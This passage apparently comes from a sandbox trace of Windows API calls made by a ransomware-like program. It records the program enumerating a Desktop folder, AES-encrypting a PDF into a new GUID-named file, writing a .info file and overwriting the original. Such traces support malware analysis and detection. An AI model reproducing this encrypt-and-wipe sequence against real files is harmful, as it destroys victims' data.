ftLastWriteTime.dwHighDateTime=0x1d4cea5, nFileSizeHigh=0x0, nFileSizeLow=0x95ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="frskbl 5R4eD.pdf", cAlternateFileName="FRSKBL~1.PDF")) returned 1 [0071.068] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc43b90, ftCreationTime.dwHighDateTime=0x1d4cc90, ftLastAccessTime.dwLowDateTime=0x2f5f89a0, ftLastAccessTime.dwHighDateTime=0x1d4c76d, ftLastWriteTime.dwLowDateTime=0x2f5f89a0, ftLastWriteTime.dwHighDateTime=0x1d4c76d, nFileSizeHigh=0x0, nFileSizeLow=0xd0b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeLdoTqchrsiJwAhL2.m4a", cAlternateFileName="PELDOT~1.M4A")) returned 1 [0071.068] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0071.068] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0071.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0071.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0071.069] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-", lpFilePart=0x0) returned 0x3a [0071.069] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\", lpFilePart=0x0) returned 0x3b [0071.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.069] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x305d6e30, ftCreationTime.dwHighDateTime=0x1d4ccea, ftLastAccessTime.dwLowDateTime=0xab4ed220, ftLastAccessTime.dwHighDateTime=0x1d4cee1, ftLastWriteTime.dwLowDateTime=0xab4ed220, ftLastWriteTime.dwHighDateTime=0x1d4cee1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.069] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x595b250, ftCreationTime.dwHighDateTime=0x1d4cbb6, ftLastAccessTime.dwLowDateTime=0x9034eba0, ftLastAccessTime.dwHighDateTime=0x1d4cea5, ftLastWriteTime.dwLowDateTime=0x9034eba0, ftLastWriteTime.dwHighDateTime=0x1d4cea5, nFileSizeHigh=0x0, nFileSizeLow=0x95ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="frskbl 5R4eD.pdf", cAlternateFileName="FRSKBL~1.PDF")) returned 1 [0071.069] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc43b90, ftCreationTime.dwHighDateTime=0x1d4cc90, ftLastAccessTime.dwLowDateTime=0x2f5f89a0, ftLastAccessTime.dwHighDateTime=0x1d4c76d, ftLastWriteTime.dwLowDateTime=0x2f5f89a0, ftLastWriteTime.dwHighDateTime=0x1d4c76d, nFileSizeHigh=0x0, nFileSizeLow=0xd0b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeLdoTqchrsiJwAhL2.m4a", cAlternateFileName="PELDOT~1.M4A")) returned 1 [0071.069] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc43b90, ftCreationTime.dwHighDateTime=0x1d4cc90, ftLastAccessTime.dwLowDateTime=0x2f5f89a0, ftLastAccessTime.dwHighDateTime=0x1d4c76d, ftLastWriteTime.dwLowDateTime=0x2f5f89a0, ftLastWriteTime.dwHighDateTime=0x1d4c76d, nFileSizeHigh=0x0, nFileSizeLow=0xd0b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeLdoTqchrsiJwAhL2.m4a", cAlternateFileName="PELDOT~1.M4A")) returned 0 [0071.070] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0071.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0071.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.071] CryptAcquireContextW (in: phProv=0x1c0ee598, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c0ee598*=0x1a5b7a10) returned 1 [0071.072] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x22be460, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee550 | out: phKey=0x1c0ee550*=0x1a626bb0) returned 1 [0071.072] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.072] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1c0ee660 | out: pbData=0x0*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0071.072] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22be550, pdwDataLen=0x1c0ee660 | out: pbData=0x22be550*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0071.072] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x22be670, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee520 | out: phKey=0x1c0ee520*=0x1a626a60) returned 1 [0071.072] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.072] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.072] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1c0ee510 | out: phKey=0x1c0ee510*=0x1a626de0) returned 1 [0071.072] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.072] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x4, pbData=0x22be7b8*=0x1, dwFlags=0x0) returned 1 [0071.072] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x1, pbData=0x22be768, dwFlags=0x0) returned 1 [0071.072] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0071.072] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0071.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0071.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.072] GetFileType (hFile=0x398) returned 0x1 [0071.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0071.072] GetFileType (hFile=0x398) returned 0x1 [0071.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", lpFilePart=0x0) returned 0x5b [0071.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0071.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.323] GetFileType (hFile=0x384) returned 0x1 [0071.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0071.323] GetFileType (hFile=0x384) returned 0x1 [0071.323] ReadFile (in: hFile=0x398, lpBuffer=0x22f9f50, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x22f9f50*, lpNumberOfBytesRead=0x1c0ee558*=0x95ac, lpOverlapped=0x0) returned 1 [0071.325] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x230df68*, pdwDataLen=0x1c0ee5b0*=0x95a0, dwBufLen=0x95a0 | out: pbData=0x230df68*, pdwDataLen=0x1c0ee5b0*=0x95a0) returned 1 [0071.325] WriteFile (in: hFile=0x384, lpBuffer=0x230df68*, nNumberOfBytesToWrite=0x95a0, lpNumberOfBytesWritten=0x1c0ee548, lpOverlapped=0x0 | out: lpBuffer=0x230df68*, lpNumberOfBytesWritten=0x1c0ee548*=0x95a0, lpOverlapped=0x0) returned 1 [0071.326] ReadFile (in: hFile=0x398, lpBuffer=0x22f9f50, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x22f9f50*, lpNumberOfBytesRead=0x1c0ee558*=0x0, lpOverlapped=0x0) returned 1 [0071.326] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2317548*, pdwDataLen=0x1c0ee4f0*=0x10, dwBufLen=0x10 | out: pbData=0x2317548*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0071.326] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2317598*, pdwDataLen=0x1c0ee4f0*=0x0, dwBufLen=0x10 | out: pbData=0x2317598*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0071.326] WriteFile (in: hFile=0x384, lpBuffer=0x23175e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1c0ee478, lpOverlapped=0x0 | out: lpBuffer=0x23175e8*, lpNumberOfBytesWritten=0x1c0ee478*=0x10, lpOverlapped=0x0) returned 1 [0071.327] CloseHandle (hObject=0x384) returned 1 [0071.327] CloseHandle (hObject=0x398) returned 1 [0071.328] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0071.328] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0071.328] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0071.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", nBufferLength=0x105, lpBuffer=0x1c0edfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD", lpFilePart=0x0) returned 0x5b [0071.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee490) returned 1 [0071.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.328] GetFileType (hFile=0x398) returned 0x1 [0071.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee400) returned 1 [0071.328] GetFileType (hFile=0x398) returned 0x1 [0071.328] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.329] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.330] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.331] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.332] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x5b0, lpOverlapped=0x0) returned 1 [0071.333] ReadFile (in: hFile=0x398, lpBuffer=0x2318d00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2318d00*, lpNumberOfBytesRead=0x1c0ee578*=0x0, lpOverlapped=0x0) returned 1 [0071.333] CloseHandle (hObject=0x398) returned 1 [0071.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD.info", nBufferLength=0x105, lpBuffer=0x1c0edd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD.info", lpFilePart=0x0) returned 0x60 [0071.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee210) returned 1 [0071.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\B5D5E8D1C4B54154BF67D27404A899DD.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\b5d5e8d1c4b54154bf67d27404a899dd.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.336] GetFileType (hFile=0x398) returned 0x1 [0071.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee180) returned 1 [0071.336] GetFileType (hFile=0x398) returned 0x1 [0071.336] WriteFile (in: hFile=0x398, lpBuffer=0x23253e0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1c0ee2e8, lpOverlapped=0x0 | out: lpBuffer=0x23253e0*, lpNumberOfBytesWritten=0x1c0ee2e8*=0x77d, lpOverlapped=0x0) returned 1 [0071.337] CloseHandle (hObject=0x398) returned 1 [0071.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5a0) returned 1 [0071.338] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), fInfoLevelId=0x0, lpFileInformation=0x1c0ee680 | out: lpFileInformation=0x1c0ee680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x595b250, ftCreationTime.dwHighDateTime=0x1d4cbb6, ftLastAccessTime.dwLowDateTime=0x9034eba0, ftLastAccessTime.dwHighDateTime=0x1d4cea5, ftLastWriteTime.dwLowDateTime=0x9034eba0, ftLastWriteTime.dwHighDateTime=0x1d4cea5, nFileSizeHigh=0x0, nFileSizeLow=0x95ac)) returned 1 [0071.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee560) returned 1 [0071.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.338] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", dwFileAttributes=0x80) returned 1 [0071.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5e0) returned 1 [0071.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), fInfoLevelId=0x0, lpFileInformation=0x232d018 | out: lpFileInformation=0x232d018*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x595b250, ftCreationTime.dwHighDateTime=0x1d4cbb6, ftLastAccessTime.dwLowDateTime=0x9034eba0, ftLastAccessTime.dwHighDateTime=0x1d4cea5, ftLastWriteTime.dwLowDateTime=0x9034eba0, ftLastWriteTime.dwHighDateTime=0x1d4cea5, nFileSizeHigh=0x0, nFileSizeLow=0x95ac)) returned 1 [0071.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5a0) returned 1 [0071.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", nBufferLength=0x105, lpBuffer=0x1c0edff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf", lpFilePart=0x0) returned 0x4b [0071.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4d0) returned 1 [0071.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DIjiqWL1q1qL 2XZCSn-\\frskbl 5R4eD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dijiqwl1q1ql 2xzcsn-\\frskbl 5r4ed.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0071.339] GetFileType (hFile=0x398) returned 0x1 [0071.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee440) returned 1 [0071.339] GetFileType (hFile=0x398) returned 0x1 [0071.339] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.340] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.341] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.341] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.342] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.343] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.344] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.345] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.345] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.346] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0071.346] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x232d500*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x600, lpOverlapped=0x0) returned 1 [0071.347] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0071.347] WriteFile (in: hFile=0x398, lpBuffer=0x232d500*, nNumberOfBytesToWrite=0x1000, 